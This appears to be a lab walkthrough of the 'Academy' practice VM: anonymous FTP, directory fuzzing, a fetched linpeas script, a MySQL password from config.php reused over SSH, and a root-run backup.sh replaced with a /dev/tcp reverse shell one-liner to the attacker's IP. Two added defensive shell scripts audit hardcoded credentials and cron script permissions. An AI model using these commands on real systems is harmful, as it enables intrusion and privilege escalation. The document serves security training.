Academy

FTP to the server, which allows anonymous login:

ftp 192.168.218.131

username: anonymous

password: anonymous

List the files on the FTP server:

ls

Download the file we found:

get note.txt

Exit and cat it on Kali.

__________________________________________________________________________________________________________

Find directories on the website:

DirBuster:

dirbuster&

ffuf:

ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt:FUZZ -u http://192.168.218.131/FUZZ

Upload a reverse shell and start a netcat listener on the port it will call back to:

nc -nvlp 1234

Go to /tmp and download linpeas for privesc:

cd /tmp
pwd
wget http://ATTACKERMACHINE/linpeas.sh

so, for example:

wget http://192.168.218.129/l

If DirBuster is still running it is using port 80, so serve linpeas with Python's http.server from the linpeas folder on another port:

cd /opt/linpeas

sudo python3 -m http.server 2222

On the victim, from /tmp (where we have write permissions):

wget http://kali.eth0.ip.here:2222/linpeas.sh

Going through the linpeas output, the interesting findings are:

/home/grimmie/backup.sh

-rw-r--r-- 1 grimmie administrator 807 May 29  2021 /home/grimmie/.profile

/var/www/html/academy/includes/config.php

$mysql_password = "My_V3ryS3cur3_P4ss";

We know there’s admin user called grimmie

We have a MySQL password that we could try with that user

We found a config.php file that we can read

reading the file:

$mysql_user = "grimmie";
$mysql_password = "My_V3ryS3cur3_P4ss";

We have the MySQL password but no obvious way to use it directly. We can try it over SSH to test for password reuse:

ssh grimmie@192.168.218.131
# when asked for the password:
My_V3ryS3cur3_P4ss
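The config.php finding above is, from the defender's side, a credential hardcoded in a PHP config that the web server account could read. As an added example (not part of these notes), here is a small POSIX shell audit that scans a web root for PHP password-like variables assigned a quoted literal and reports, for each hit, the file's mode and whether it is readable beyond its owner. It deliberately prints the variable name and never the value, assumes GNU coreutils `stat`, and runs against a constructed sample web root that mirrors the config.php above; the sample paths, variable names and values are made up.

```sh
#!/bin/sh
# Added example, not from the original notes: find PHP config files that
# assign a password-like variable a literal string, and report whether the
# file is readable by anyone other than its owner. Assumes GNU coreutils
# `stat` (for -c '%a'); the sample web root below is constructed.

# find_hardcoded_creds WEBROOT
# Prints one line per hit:  <file> mode=<octal> <varname>[ readable-by-others]
# The secret value itself is never printed.
find_hardcoded_creds() {
    webroot="$1"
    # Heuristic: a PHP variable whose name contains pass/pwd/secret, assigned
    # a single- or double-quoted literal. Names like $bypass will also match.
    pat="\\\$[A-Za-z0-9_]*(pass|pwd|secret)[A-Za-z0-9_]*[[:space:]]*=[[:space:]]*[\"'][^\"']+[\"']"
    find "$webroot" -type f \( -name '*.php' -o -name '*.inc' \) -print | sort |
    while IFS= read -r file; do
        mode=$(stat -c '%a' "$file")
        mode="${mode#"${mode%???}"}"          # keep the last three octal digits
        case "$mode" in
            ?[4567]?|??[4567]) flag=" readable-by-others" ;;  # group or other has r
            *)                 flag="" ;;
        esac
        grep -E -i -o "$pat" "$file" 2>/dev/null |
        while IFS= read -r match; do
            varname="${match%%[[:space:]=]*}"  # cut at the first space or '='
            printf '%s mode=%s %s%s\n' "$file" "$mode" "$varname" "$flag"
        done
    done
}

# demo_webroot
# Builds a constructed web root in a temp dir, modelled on the
# academy/includes/config.php layout from the notes, and prints its path.
demo_webroot() {
    dir=$(mktemp -d)
    mkdir -p "$dir/academy/includes"
    cat > "$dir/academy/includes/config.php" <<'EOF'
<?php
// constructed sample config (values are placeholders)
$mysql_hostname = "localhost";
$mysql_user = "grimmie";
$mysql_password = "constructed-password-1";
$api_secret = 'constructed-secret-2';
?>
EOF
    chmod 644 "$dir/academy/includes/config.php"   # world-readable: should be flagged
    cat > "$dir/academy/index.php" <<'EOF'
<?php
require_once 'includes/config.php';
$password = $_POST['password'];   // not a literal, must not be reported
echo "ok";
?>
EOF
    chmod 640 "$dir/academy/index.php"
    printf '%s\n' "$dir"
}

# Stand-alone run against the constructed web root. On a real host you would
# run, for example:  find_hardcoded_creds /var/www/html
find_hardcoded_creds "$(demo_webroot)"
```

Redacting the value is intentional: the audit's job is to point at files to fix (move the credential out of the web root or tighten the mode so only the service account can read it), not to collect secrets into another log. Because the match is a name heuristic, expect to review the hits by hand.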

Running ls, we see the backup.sh that linpeas flagged earlier.

We use pspy64 to watch running processes. It scans in real time, so leaving it running for a while reveals jobs that run every X minutes.

We find that backup.sh runs every X minutes. Since we are the user who owns this file, we can edit it with nano and replace its contents with a reverse shell one-liner:

bash -i >& /dev/tcp/192.168.218.128/8081 0>&1

and start netcat listening for that connection on Kali:

nc -nvlp 8081

and wait for the script to run again.

Once we get root access, we can ls and cat files (or do whatever; we have root!)
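The escalation above works because a scheduled job running as root executes a script that an unprivileged user owns and can edit. As an added example (not from these notes), this POSIX shell audit reads an /etc/crontab-style file (fields: minute hour dom month dow user command, or @reboot/@daily user command), and flags every job script whose owner differs from the job's user or which is group- or world-writable. It assumes GNU coreutils `stat` and runs against a constructed fixture in a temp dir (`backupsvc` is a made-up job user and the script names are made up); on a real host you would point it at /etc/crontab and the files under /etc/cron.d.

```sh
#!/bin/sh
# Added example, not from the original notes: audit cron jobs for scripts
# that a different (less privileged) user owns or that others can write to,
# which is the weakness behind the backup.sh escalation above.
# Assumes GNU coreutils `stat` (for -c '%U' and '%a'); fixture is constructed.

# audit_cron_scripts FILE
# FILE is in /etc/crontab format. For each job whose command is an absolute
# path, prints "WEAK <path> owner=.. mode=.. job_user=..: <reason>" or
# "OK <path>"; non-existent scripts are reported as MISSING.
# Returns 1 if at least one WEAK line was printed, else 0.
audit_cron_scripts() {
    cronfile="$1"
    weak=0
    while IFS= read -r line || [ -n "$line" ]; do
        set -f              # no globbing: schedules contain '*'
        set -- $line        # split the line into fields
        set +f
        case "${1:-}" in
            ''|\#*|*=*) continue ;;                  # blank, comment or VAR=value
            @*) jobuser="${2:-}"; cmd="${3:-}" ;;     # @reboot/@daily user command
            *)  jobuser="${6:-}"; cmd="${7:-}" ;;     # m h dom mon dow user command
        esac
        case "$cmd" in
            /*) ;;                                   # only audit absolute script paths
            *)  continue ;;
        esac
        if [ ! -f "$cmd" ]; then
            printf 'MISSING %s (job_user=%s)\n' "$cmd" "$jobuser"
            continue
        fi
        owner=$(stat -c '%U' "$cmd")
        mode=$(stat -c '%a' "$cmd")
        mode="${mode#"${mode%???}"}"                 # last three octal digits
        reason=""
        [ "$owner" = "$jobuser" ] || reason="owner differs from job user"
        case "$mode" in ?[2367]?) reason="${reason:+$reason; }group-writable" ;; esac
        case "$mode" in ??[2367]) reason="${reason:+$reason; }world-writable" ;; esac
        if [ -n "$reason" ]; then
            printf 'WEAK %s owner=%s mode=%s job_user=%s: %s\n' \
                "$cmd" "$owner" "$mode" "$jobuser" "$reason"
            weak=1
        else
            printf 'OK %s\n' "$cmd"
        fi
    done < "$cronfile"
    return "$weak"
}

# demo_cron_fixture
# Builds a constructed fixture: three scripts and a crontab referencing
# them, in a temp dir. Prints the crontab path.
demo_cron_fixture() {
    dir=$(mktemp -d)
    me=$(id -un)
    printf '#!/bin/sh\necho backup\n' > "$dir/backup.sh"
    chmod 755 "$dir/backup.sh"     # owned by us but run as 'backupsvc' -> WEAK
    printf '#!/bin/sh\necho rotate\n' > "$dir/rotate.sh"
    chmod 777 "$dir/rotate.sh"     # world-writable -> WEAK
    printf '#!/bin/sh\necho ok\n' > "$dir/own.sh"
    chmod 700 "$dir/own.sh"        # owned and run by the same user -> OK
    cat > "$dir/crontab" <<EOF
# constructed /etc/crontab-style fixture
SHELL=/bin/sh
PATH=/usr/bin:/bin
*/1 * * * * backupsvc $dir/backup.sh
@daily      $me       $dir/rotate.sh
0 3 * * *   $me       $dir/own.sh
EOF
    printf '%s\n' "$dir/crontab"
}

# Stand-alone run against the fixture. On a real host:  audit_cron_scripts /etc/crontab
audit_cron_scripts "$(demo_cron_fixture)" || echo "weak cron scripts found"
```

The owner-versus-job-user comparison is the check that matters for this box: the fix is for root-run scripts to be owned by root with mode 755 or tighter, and the same rule should be applied to the scripts' parent directories, which this example does not walk.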